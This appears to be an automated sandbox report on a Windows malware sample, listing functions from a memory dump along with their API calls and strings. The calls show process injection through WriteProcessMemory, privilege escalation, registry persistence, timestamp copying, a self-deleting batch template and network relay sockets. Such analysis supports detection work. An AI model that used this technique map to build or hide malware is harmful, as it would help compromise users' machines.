WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00AF9210
FlushFileBuffers.KERNEL32 ref: 00AF9229

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

CloseHandle.KERNEL32 ref: 00AF923C
SetLastError.KERNEL32(00000000,?,?,00001000,?,?,?,?,00B00646,?,?,?,?), ref: 00AF9257

Part of subcall function 00AEE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00AEE82F
Part of subcall function 00AEE826: DeleteFileW.KERNEL32(?), ref: 00AEE836

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEB392, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 230

APIs

Part of subcall function 00B10741: CoInitializeEx.OLE32(00000000,00000000), ref: 00B1074E

Part of subcall function 00AF9F57: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,00AEB41A,?), ref: 00AF9F69
Part of subcall function 00AF9F57: #2.OLEAUT32(00AEB41A,00000000,?,?,?,00AEB41A,?), ref: 00AF9F9D
Part of subcall function 00AF9F57: #6.OLEAUT32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00AEB41A,?), ref: 00AF9FD2
Part of subcall function 00AF9F57: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00AF9FF2

#2.OLEAUT32(WQL,?), ref: 00AEB480
#2.OLEAUT32(?,?), ref: 00AEB49C
#6.OLEAUT32(?,?,00000030,00000000,?), ref: 00AEB4CC
#9.OLEAUT32(?), ref: 00AEB53D

Part of subcall function 00AF9F2C: #6.OLEAUT32(?,00000000,00AEB574), ref: 00AF9F49
Part of subcall function 00AF9F2C: CoUninitialize.OLE32 ref: 00B1078C

memcpy.MSVCRT ref: 00AEB616
memcpy.MSVCRT ref: 00AEB628
memcpy.MSVCRT ref: 00AEB63A

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AF69B0: HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

Strings

WQL, xrefs: 00AEB47B
displayName, xrefs: 00AEB50A

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFE257, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 160

APIs

Part of subcall function 00AF568C: TlsSetValue.KERNEL32(00000001,00AFE1BD), ref: 00AF5699

GetCurrentThread.KERNEL32 ref: 00AFE26F
SetThreadPriority.KERNEL32 ref: 00AFE276

Part of subcall function 00B0BEE3: CreateMutexW.KERNEL32(00B22974,00000000,?), ref: 00B0BF05

Part of subcall function 00AE9F72: memcpy.MSVCRT ref: 00AE9F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00AFE2C0

Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0439E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI ref: 00B043A8
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B043F1
Part of subcall function 00B0432D: memcpy.MSVCRT ref: 00B0441E
Part of subcall function 00B0432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

Part of subcall function 00AFE22A: PathFindFileNameW.SHLWAPI(?), ref: 00AFE22E
Part of subcall function 00AFE22A: PathRemoveExtensionW.SHLWAPI(?), ref: 00AFE242
Part of subcall function 00AFE22A: CharUpperW.USER32(?,?,?,00AFE32B), ref: 00AFE24C

PathQuoteSpacesW.SHLWAPI(?), ref: 00AFE333

Part of subcall function 00B04B8D: WaitForSingleObject.KERNEL32(00000000,00AFE1D7), ref: 00B04B95

WaitForSingleObject.KERNEL32 ref: 00AFE374
StrCmpW.SHLWAPI(?,?), ref: 00AFE3CE

Part of subcall function 00B00D74: RegCreateKeyExW.ADVAPI32(80000001,00000102,00000000,00000000,00000000,?,00000000,?,?), ref: 00B00D9C

RegSetValueExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00AFE42F

Part of subcall function 00B00D19: RegFlushKey.ADVAPI32 ref: 00B00D29
Part of subcall function 00B00D19: RegCloseKey.ADVAPI32 ref: 00B00D31

WaitForSingleObject.KERNEL32 ref: 00AFE450

Part of subcall function 00AF2FB7: ReleaseMutex.KERNEL32 ref: 00AF2FBB
Part of subcall function 00AF2FB7: CloseHandle.KERNEL32 ref: 00AF2FC2

Part of subcall function 00B1046D: EnterCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B1047A
Part of subcall function 00B1046D: LeaveCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B10488

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00AFE2E2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B04214, Relevance: 15.1, APIs: 5, Strings: 2, Instructions: 97

APIs

EnterCriticalSection.KERNEL32(00B23510,?,00B22DB4,00000000,00000006,?,00B0BBC2,00B22DB4,?,?,00000000), ref: 00B0422E
LeaveCriticalSection.KERNEL32(00B23510,?,00B22DB4,00000000,00000006,?,00B0BBC2,00B22DB4,?,?,00000000), ref: 00B04261

Part of subcall function 00AFDEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00AFDEC9
Part of subcall function 00AFDEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00AFDED5
Part of subcall function 00AFDEBB: SetLastError.KERNEL32(00000001,00B042C8,00B22954,?,00B22DB4,00000000,00000006,?,00B0BBC2,00B22DB4,?,?,00000000), ref: 00AFDEED

CoTaskMemFree.OLE32(00000000), ref: 00B042F6
PathRemoveBackslashW.SHLWAPI(?), ref: 00B04303
SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00B0431A

Strings

SHGetKnownFolderPath, xrefs: 00B042B9
shell32.dll, xrefs: 00B042BE

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AE869E, Relevance: 15.1, APIs: 10, Instructions: 53

APIs

VirtualProtect.KERNEL32(?,00AF37D4,00000000,?), ref: 00AF3756

Part of subcall function 00AF6B09: memcmp.MSVCRT ref: 00AF6B29

GetCurrentThread.KERNEL32 ref: 00AF36AC
GetThreadPriority.KERNEL32 ref: 00AF36B5
SetThreadPriority.KERNEL32(?,0000000F), ref: 00AF36C6
Sleep.KERNEL32(00000000), ref: 00AF36CA
memcpy.MSVCRT ref: 00AF36D9
FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 00AF36EA
SetThreadPriority.KERNEL32 ref: 00AF36F2

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

GetTickCount.KERNEL32 ref: 00AF370D
GetTickCount.KERNEL32 ref: 00AF371A
Sleep.KERNEL32(00000000), ref: 00AF3727

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEBFFE, Relevance: 15.0, APIs: 8, Instructions: 324

APIs

Part of subcall function 00B05C6B: memset.MSVCRT ref: 00B05C7A
Part of subcall function 00B05C6B: memcpy.MSVCRT ref: 00B05CA1

Part of subcall function 00B10741: CoInitializeEx.OLE32(00000000,00000000), ref: 00B1074E

getsockopt.WS2_32(?,0000FFFF,00001008,?,?), ref: 00AEC08A
GetHandleInformation.KERNEL32(?,?), ref: 00AEC09C

Part of subcall function 00B12755: EnterCriticalSection.KERNEL32(00B23510,?,00B130AF,?,?,00000000), ref: 00B12765
Part of subcall function 00B12755: LeaveCriticalSection.KERNEL32(00B23510,?,00000000), ref: 00B1278F

socket.WS2_32(?,00000001,00000006), ref: 00AEC0CF
socket.WS2_32(?,00000002,00000011), ref: 00AEC0E0
closesocket.WS2_32(00000002), ref: 00AEC0FF
closesocket.WS2_32 ref: 00AEC106

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

memset.MSVCRT ref: 00AEC1C8

Part of subcall function 00B12BF3: bind.WS2_32(?,00B12CD1), ref: 00B12C3A
Part of subcall function 00B12BF3: listen.WS2_32(?,00000014), ref: 00B12C4F
Part of subcall function 00B12BF3: WSAGetLastError.WS2_32(00000000,?,00B12CD1,?,?,?,?,00000000), ref: 00B12C5D
Part of subcall function 00B12BF3: WSASetLastError.WS2_32(?,?,00B12CD1,?,?,?,?,00000000), ref: 00B12C6D

Part of subcall function 00B12C7A: memset.MSVCRT ref: 00B12C90
Part of subcall function 00B12C7A: WSAGetLastError.WS2_32(?,?,?,?,00000000), ref: 00B12CD5

Part of subcall function 00B12AB4: memset.MSVCRT ref: 00B12AC9
Part of subcall function 00B12AB4: getsockname.WS2_32(?,00AEC22C,?), ref: 00B12ADC

Part of subcall function 00AEC3F3: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00AEC404

memcpy.MSVCRT ref: 00AEC3C8

Part of subcall function 00B0BF3B: CoUninitialize.OLE32 ref: 00B1078C

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B108D2, Relevance: 15.0, APIs: 8, Instructions: 103

APIs

getpeername.WS2_32(?,?,?), ref: 00B10909
getsockname.WS2_32(?,?,?), ref: 00B10926
memcpy.MSVCRT ref: 00B10949
memcpy.MSVCRT ref: 00B10956
memcpy.MSVCRT ref: 00B10976
memcpy.MSVCRT ref: 00B10983
memset.MSVCRT ref: 00B10993
memcpy.MSVCRT ref: 00B109E3

Part of subcall function 00AF6BFF: send.WS2_32(?,?,00000015,00000000), ref: 00AF6C07

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0432D, Relevance: 14.8, APIs: 5, Instructions: 98

APIs

memcpy.MSVCRT ref: 00B0439E
PathRemoveBackslashW.SHLWAPI ref: 00B043A8
memcpy.MSVCRT ref: 00B043F1
memcpy.MSVCRT ref: 00B0441E
PathRemoveBackslashW.SHLWAPI(?), ref: 00B04428

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEE717, Relevance: 14.7, APIs: 5, Strings: 2, Instructions: 89

APIs

memcpy.MSVCRT ref: 00AEE775
memcpy.MSVCRT ref: 00AEE78A
memcpy.MSVCRT ref: 00AEE79F
memcpy.MSVCRT ref: 00AEE7AE

Part of subcall function 00AEE301: EnterCriticalSection.KERNEL32(00B23510,?,00AEE5BF,?,00AEE617,?,?,?,?,C:\Documents and Settings\Administrator\Local Settings\Application Data,00000000,00000000,00000000,?,00000000), ref: 00AEE311
Part of subcall function 00AEE301: LeaveCriticalSection.KERNEL32(00B23510,?,00000000,?,00000002,?,C:\Documents and Settings\Administrator\Local Settings\Application Data,C:\Documents and Settings\Administrator\Local Settings\Application Data,?,00AFBE0B,?,?,00000830), ref: 00AEE340

Part of subcall function 00AFDEBB: GetModuleHandleW.KERNEL32(shell32.dll), ref: 00AFDEC9
Part of subcall function 00AFDEBB: GetProcAddress.KERNEL32(?,SHGetKnownFolderPath), ref: 00AFDED5
Part of subcall function 00AFDEBB: SetLastError.KERNEL32(00000001,00B042C8,00B22954,?,00B22DB4,00000000,00000006,?,00B0BBC2,00B22DB4,?,?,00000000), ref: 00AFDEED

SetFileTime.KERNEL32(?,?,?,?), ref: 00AEE813

Strings

SetFileInformationByHandle, xrefs: 00AEE7BD
kernel32.dll, xrefs: 00AEE7C2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEE5F1, Relevance: 14.5, APIs: 6, Strings: 1, Instructions: 82

APIs

memcpy.MSVCRT ref: 00AEE632
memcpy.MSVCRT ref: 00AEE645
memcpy.MSVCRT ref: 00AEE658
memcpy.MSVCRT ref: 00AEE663
GetFileTime.KERNEL32(?,?,?), ref: 00AEE687
memcpy.MSVCRT ref: 00AEE69D

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 00AEE5F8

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B0303C, Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 193

APIs

EnterCriticalSection.KERNEL32(00B23510,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B0305A
LeaveCriticalSection.KERNEL32(00B23510,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B03084

Part of subcall function 00B01215: memset.MSVCRT ref: 00B0122B
Part of subcall function 00B01215: InitializeCriticalSection.KERNEL32(00B22910), ref: 00B0123B
Part of subcall function 00B01215: memset.MSVCRT ref: 00B0126A
Part of subcall function 00B01215: InitializeCriticalSection.KERNEL32(00B228F0), ref: 00B01274

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

Part of subcall function 00B13DAE: memcpy.MSVCRT ref: 00B13DE4

memcmp.MSVCRT ref: 00B03175
memcmp.MSVCRT ref: 00B031A6

Part of subcall function 00B13D5A: memcpy.MSVCRT ref: 00B13D94

EnterCriticalSection.KERNEL32(00B22910), ref: 00B03219

Part of subcall function 00B0130C: GetTickCount.KERNEL32 ref: 00B01313

Part of subcall function 00B01723: EnterCriticalSection.KERNEL32(00B228F0,00B2292C,?,?,00B22910), ref: 00B01736
Part of subcall function 00B01723: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00B017E1
Part of subcall function 00B01723: LeaveCriticalSection.KERNEL32(00B228F0,?,?,00B22910), ref: 00B018CB

Part of subcall function 00B0198D: EnterCriticalSection.KERNEL32(00DB2820,?,?,?,?,00B22910), ref: 00B01A67
Part of subcall function 00B0198D: LeaveCriticalSection.KERNEL32(00DB2820,000000FF,00000000,?,?,?,?,00B22910), ref: 00B01A8F

LeaveCriticalSection.KERNEL32(00B22910,00B2292C,00B2292C,00B2292C), ref: 00B03269

Part of subcall function 00B05FC2: lstrlenA.KERNEL32(?,?,?,?,?,?,00B2292C,?,?,00B22910,?,?,?,?,00B03260,00B2292C), ref: 00B05FD6

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Strings

!, xrefs: 00B03187
!, xrefs: 00B031AF

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF9633, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 107

APIs

LoadLibraryW.KERNEL32(?), ref: 00AF9657
GetProcAddress.KERNEL32(?,?), ref: 00AF9685
GetProcAddress.KERNEL32(?,?), ref: 00AF969F
GetProcAddress.KERNEL32(?,?), ref: 00AF96BB
FreeLibrary.KERNEL32 ref: 00AF9769

Part of subcall function 00AF50C0: GetCurrentThread.KERNEL32 ref: 00AF50D4
Part of subcall function 00AF50C0: OpenThreadToken.ADVAPI32 ref: 00AF50DB
Part of subcall function 00AF50C0: GetCurrentProcess.KERNEL32 ref: 00AF50EB
Part of subcall function 00AF50C0: OpenProcessToken.ADVAPI32 ref: 00AF50F2
Part of subcall function 00AF50C0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00AF5113
Part of subcall function 00AF50C0: AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00AF5128
Part of subcall function 00AF50C0: GetLastError.KERNEL32 ref: 00AF5132
Part of subcall function 00AF50C0: CloseHandle.KERNEL32(00000001), ref: 00AF5143

WTSGetActiveConsoleSessionId.KERNEL32 ref: 00AF96E8

Part of subcall function 00AF95BE: EqualSid.ADVAPI32(?,5B867A00), ref: 00AF95E1
Part of subcall function 00AF95BE: CloseHandle.KERNEL32(00000001), ref: 00AF9628

Strings

SeTcbPrivilege, xrefs: 00AF96DE

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF6F3F, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 88

APIs

GetFileAttributesW.KERNEL32(?), ref: 00AF6F50
FlushFileBuffers.KERNEL32 ref: 00AF7036

Part of subcall function 00B044FB: FindFirstFileW.KERNEL32(?,?), ref: 00B0452C
Part of subcall function 00B044FB: FindNextFileW.KERNEL32(?,?), ref: 00B0457E
Part of subcall function 00B044FB: FindClose.KERNEL32 ref: 00B04589
Part of subcall function 00B044FB: SetFileAttributesW.KERNEL32(?,00000080), ref: 00B04595
Part of subcall function 00B044FB: RemoveDirectoryW.KERNEL32(?), ref: 00B0459C

Part of subcall function 00AEE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00AEE82F
Part of subcall function 00AEE826: DeleteFileW.KERNEL32(?), ref: 00AEE836

PathRemoveFileSpecW.SHLWAPI(?), ref: 00AF6F85

Part of subcall function 00AEE35B: GetTempPathW.KERNEL32(00000104,?), ref: 00AEE376
Part of subcall function 00AEE35B: PathAddBackslashW.SHLWAPI(?), ref: 00AEE3A0
Part of subcall function 00AEE35B: CreateDirectoryW.KERNEL32(?), ref: 00AEE457
Part of subcall function 00AEE35B: SetFileAttributesW.KERNEL32(?), ref: 00AEE468
Part of subcall function 00AEE35B: CreateFileW.KERNEL32(?,C0000000,?,00000000,00000001,?), ref: 00AEE481
Part of subcall function 00AEE35B: GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00000001), ref: 00AEE492

MoveFileExW.KERNEL32(?,?,00000001), ref: 00AF6FCC
CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 00AF6FE5

Part of subcall function 00AEE56C: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00AEE594

Part of subcall function 00AEE348: CloseHandle.KERNEL32 ref: 00AEE354

Sleep.KERNEL32(00001388), ref: 00AF7028

Strings

.tmp, xrefs: 00AF6F9C

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B01051, Relevance: 14.2, APIs: 5, Strings: 2, Instructions: 47

APIs

EnterCriticalSection.KERNEL32(00B23510,?,?,00000000,00B011FB,?,?,?,7C809C98,00000014,00000000), ref: 00B01067
LeaveCriticalSection.KERNEL32(00B23510,?,?,00000000,00B011FB,?,?,?,7C809C98,00000014,00000000), ref: 00B0108F
GetModuleHandleW.KERNEL32(advapi32.dll), ref: 00B010AB
GetProcAddress.KERNEL32 ref: 00B010B2
RegDeleteKeyW.ADVAPI32(?,?), ref: 00B010D4

Strings

RegDeleteKeyExW, xrefs: 00B010A1
advapi32.dll, xrefs: 00B010A6

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B140CB, Relevance: 14.2, APIs: 8, Instructions: 68

APIs

OpenProcess.KERNEL32(0000047A,00000000,?), ref: 00B140DC

Part of subcall function 00B04A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00B04A89
Part of subcall function 00B04A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00B04AC4
Part of subcall function 00B04A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00B04B04
Part of subcall function 00B04A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00B04B27
Part of subcall function 00B04A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00B04B77

CreateThread.KERNEL32(00000000,00000000,00B140AB,?), ref: 00B14132
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B1413D
CloseHandle.KERNEL32 ref: 00B14144
WaitForSingleObject.KERNEL32(?,00002710), ref: 00B14154
CloseHandle.KERNEL32(?), ref: 00B1415B
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00B1416C
CloseHandle.KERNEL32 ref: 00B14173

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B11474, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 223

APIs

Part of subcall function 00B12A21: getsockopt.WS2_32(?,0000FFFF,00002004,?,?), ref: 00B12A47

Part of subcall function 00AF6B66: select.WS2_32(00000000,?,00000000,00000000), ref: 00AF6BC5
Part of subcall function 00AF6B66: recv.WS2_32(?,?,?,00000000), ref: 00AF6BD5

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00B1154F
memcpy.MSVCRT ref: 00B11587
FreeAddrInfoW.WS2_32(?), ref: 00B11595
memset.MSVCRT ref: 00B115B0

Part of subcall function 00B113F4: getpeername.WS2_32(?,?,?), ref: 00B11418
Part of subcall function 00B113F4: getsockname.WS2_32(?,?,?), ref: 00B11430
Part of subcall function 00B113F4: send.WS2_32(00000000,?,00000008,00000000), ref: 00B11461

Part of subcall function 00AF6D02: socket.WS2_32(?,00000001,00000006), ref: 00AF6D0E
Part of subcall function 00AF6D02: bind.WS2_32 ref: 00AF6D2B
Part of subcall function 00AF6D02: listen.WS2_32(?,00000001), ref: 00AF6D38
Part of subcall function 00AF6D02: WSAGetLastError.WS2_32(?,?,?,?,00000001,00000006,?,?,00B115FC,?,?,?), ref: 00AF6D42
Part of subcall function 00AF6D02: closesocket.WS2_32 ref: 00AF6D4B
Part of subcall function 00AF6D02: WSASetLastError.WS2_32(?,?,?,?,?,?,00000001,00000006,?,?,00B115FC,?,?,?), ref: 00AF6D52

Part of subcall function 00AF6EB5: accept.WS2_32(?,00000000,?), ref: 00AF6ED6

Part of subcall function 00AF6C17: socket.WS2_32(?,00000001,00000006), ref: 00AF6C23
Part of subcall function 00AF6C17: connect.WS2_32 ref: 00AF6C40
Part of subcall function 00AF6C17: closesocket.WS2_32 ref: 00AF6C4B

Part of subcall function 00B1304D: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 00B13061

Part of subcall function 00AF6D60: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00AF6D88
Part of subcall function 00AF6D60: recv.WS2_32(?,?,00000400,00000000), ref: 00AF6DB4
Part of subcall function 00AF6D60: send.WS2_32(?,?,?,00000000), ref: 00AF6DD6
Part of subcall function 00AF6D60: select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 00AF6E03

Part of subcall function 00AF6EE0: shutdown.WS2_32(?,00000002), ref: 00AF6EEB
Part of subcall function 00AF6EE0: closesocket.WS2_32 ref: 00AF6EF2

Strings

[, xrefs: 00B115CD
[, xrefs: 00B11609
[, xrefs: 00B116E7
Z, xrefs: 00B11700

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF3D4F, Relevance: 13.8, APIs: 9, Instructions: 261

APIs

GetTickCount.KERNEL32 ref: 00AF3D5E
EnterCriticalSection.KERNEL32 ref: 00AF3D73
WaitForSingleObject.KERNEL32(?,000927C0), ref: 00AF3DB8
GetTickCount.KERNEL32 ref: 00AF3DCB

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00B0D95F: GetSystemTime.KERNEL32(?), ref: 00B0D969

Part of subcall function 00AECEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00AECEB9

GetTickCount.KERNEL32 ref: 00AF3FC5

Part of subcall function 00AEF1EF: memcmp.MSVCRT ref: 00AEF1FB

Part of subcall function 00AECD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00AF3FA1), ref: 00AECD70
Part of subcall function 00AECD5A: memcpy.MSVCRT ref: 00AECDCD
Part of subcall function 00AECD5A: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00AF3FA1,?,00000002), ref: 00AECDDD
Part of subcall function 00AECD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00AECE11
Part of subcall function 00AECD5A: LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00AF3FA1), ref: 00AECE9F

Part of subcall function 00AF3906: memset.MSVCRT ref: 00AF39D5
Part of subcall function 00AF3906: memcpy.MSVCRT ref: 00AF3A30
Part of subcall function 00AF3906: memcmp.MSVCRT ref: 00AF3AAB
Part of subcall function 00AF3906: memcpy.MSVCRT ref: 00AF3AFF
Part of subcall function 00AF3906: EnterCriticalSection.KERNEL32(?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00AF3BD2
Part of subcall function 00AF3906: LeaveCriticalSection.KERNEL32(?,?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00AF3BF0

GetTickCount.KERNEL32 ref: 00AF3FFE
LeaveCriticalSection.KERNEL32(?,?,00000002), ref: 00AF4021

Part of subcall function 00B1046D: EnterCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B1047A
Part of subcall function 00B1046D: LeaveCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B10488

WaitForSingleObject.KERNEL32(?,-001B7740), ref: 00AF4046
LeaveCriticalSection.KERNEL32 ref: 00AF405C

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF3906, Relevance: 13.6, APIs: 6, Strings: 1, Instructions: 326

APIs

Part of subcall function 00B05594: GetSystemTime.KERNEL32(?), ref: 00B055BA
Part of subcall function 00B05594: Sleep.KERNEL32(000005DC), ref: 00B055D3
Part of subcall function 00B05594: WaitForSingleObject.KERNEL32(?,000005DC), ref: 00B055DC

Part of subcall function 00AEECBD: memcmp.MSVCRT ref: 00AEED1A
Part of subcall function 00AEECBD: memcpy.MSVCRT ref: 00AEED5A

Part of subcall function 00B04BA2: memcpy.MSVCRT ref: 00B04BB2

Part of subcall function 00AEEE09: memset.MSVCRT ref: 00AEEE1C
Part of subcall function 00AEEE09: memcpy.MSVCRT ref: 00AEEE37
Part of subcall function 00AEEE09: memcpy.MSVCRT ref: 00AEEE5F
Part of subcall function 00AEEE09: memcpy.MSVCRT ref: 00AEEE83

memset.MSVCRT ref: 00AF39D5

Part of subcall function 00AECD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00AF3FA1), ref: 00AECD70
Part of subcall function 00AECD5A: memcpy.MSVCRT ref: 00AECDCD
Part of subcall function 00AECD5A: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00AF3FA1,?,00000002), ref: 00AECDDD
Part of subcall function 00AECD5A: EnterCriticalSection.KERNEL32(?,?,00000000,00000000,-00001388,?,00000000,00000000), ref: 00AECE11
Part of subcall function 00AECD5A: LeaveCriticalSection.KERNEL32(?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00AF3FA1), ref: 00AECE9F

Part of subcall function 00AEF1A8: EnterCriticalSection.KERNEL32(00B23510,?,00AEC78E,?,?,?,00000001,00B04DE8,00000001), ref: 00AEF1B8
Part of subcall function 00AEF1A8: LeaveCriticalSection.KERNEL32(00B23510,?,00AEC78E,?,?,?,00000001,00B04DE8,00000001), ref: 00AEF1E2

memcpy.MSVCRT ref: 00AF3A30

Part of subcall function 00AECEB1: WaitForSingleObject.KERNEL32(?,00000000), ref: 00AECEB9

memcmp.MSVCRT ref: 00AF3AAB

Part of subcall function 00AF6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?,?), ref: 00AF6A43
Part of subcall function 00AF6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?), ref: 00AF6A56

memcpy.MSVCRT ref: 00AF3AFF

Part of subcall function 00AEF0E1: memcmp.MSVCRT ref: 00AEF0FD

Part of subcall function 00AEF1EF: memcmp.MSVCRT ref: 00AEF1FB

Part of subcall function 00B1046D: EnterCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B1047A
Part of subcall function 00B1046D: LeaveCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B10488

Part of subcall function 00AF23F1: memcpy.MSVCRT ref: 00AF2409

EnterCriticalSection.KERNEL32(?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00AF3BD2
LeaveCriticalSection.KERNEL32(?,?,?,00000FA0,?,-00001388,?,?,?,?,?,?,?,00000001), ref: 00AF3BF0

Part of subcall function 00AEEEA9: memcpy.MSVCRT ref: 00AEEED2

Part of subcall function 00AEEDAE: memcpy.MSVCRT ref: 00AEEDF9

Part of subcall function 00AEF040: memcmp.MSVCRT ref: 00AEF0B6

